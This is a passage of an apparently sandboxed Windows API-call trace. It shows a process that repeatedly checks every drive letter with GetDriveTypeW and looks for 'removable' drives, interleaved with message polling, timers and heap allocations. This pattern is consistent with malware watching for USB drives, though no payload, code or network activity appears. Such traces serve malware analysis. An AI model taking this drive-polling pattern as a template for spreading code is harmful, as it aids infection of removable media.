(lpRootPathName="p:\\") returned 0x1 [0210.736] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.736] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.736] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.736] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.736] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.736] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.737] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.737] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.737] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.737] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.738] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.738] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.738] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.738] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.738] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.738] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.738] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.738] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.739] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.739] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.739] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.739] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.739] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.740] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.740] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.740] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.740] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.741] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.741] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.741] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.741] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.741] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.742] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.742] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.742] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.743] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.743] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.743] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.743] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.743] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.744] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.744] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.744] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.744] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.744] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.745] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.745] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.745] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.745] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.745] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.745] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.745] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.745] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.745] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.745] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.745] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.745] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.746] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.746] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.746] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.746] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.746] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.746] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.746] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.747] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.747] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.747] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.747] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.747] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.747] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.748] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.748] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.748] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.748] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.749] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.749] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.749] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.749] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.749] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.750] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.750] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.750] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.750] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.750] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.750] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.750] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.750] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.750] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.750] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.750] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.751] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.751] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.751] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.751] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.751] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.751] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.752] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.752] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.752] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.752] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.752] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.752] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.752] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.753] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.753] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.753] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.753] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.753] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.753] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.753] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.754] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.754] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.754] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.754] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.754] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.754] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.754] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.754] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.754] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.754] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.754] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.755] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.755] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.755] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.755] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.755] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.755] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.756] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.756] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.756] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.756] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.756] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.756] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.756] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.757] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.757] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.757] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.757] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.757] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.758] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.758] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.758] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.758] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.758] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.758] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.759] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.759] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.759] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.759] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.759] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.759] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.759] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.759] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.759] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.759] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.760] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.760] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.760] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.760] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.760] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.760] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.760] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.760] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.761] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.761] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.761] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.761] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.762] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.762] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.762] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.762] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.762] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.762] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.763] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0212.086] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0212.086] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0212.087] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0212.087] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0212.087] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0212.088] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0212.089] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0212.089] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0212.089] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0212.089] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0212.089] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0212.090] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.090] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0212.090] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0212.090] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0212.090] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0212.090] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0212.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0212.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0212.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0212.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0212.091] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0212.091] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0212.091] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0212.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0212.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0212.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0212.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0212.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0212.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0212.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0212.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0212.092] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0212.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.092] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0212.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0212.092] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0212.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0212.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0212.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0212.093] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0212.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0212.099] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0212.100] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0212.100] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0212.100] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.100] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.100] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0212.100] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0212.100] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0212.100] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0212.100] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0212.101] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0212.101] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0212.101] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0212.101] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0212.102] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0212.102] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0212.105] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0212.105] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0212.176] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0212.176] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0212.176] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0212.177] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0212.177] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0212.177] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0212.177] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0212.178] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0212.178] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0212.178] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0212.179] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0212.179] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0212.179] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0212.180] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0212.180] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0212.180] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0212.180] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0212.180] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0212.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0212.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0212.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0212.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0212.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0212.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0212.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0212.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0212.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0212.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0212.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0212.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.182] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0212.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0212.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325dc0 [0212.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 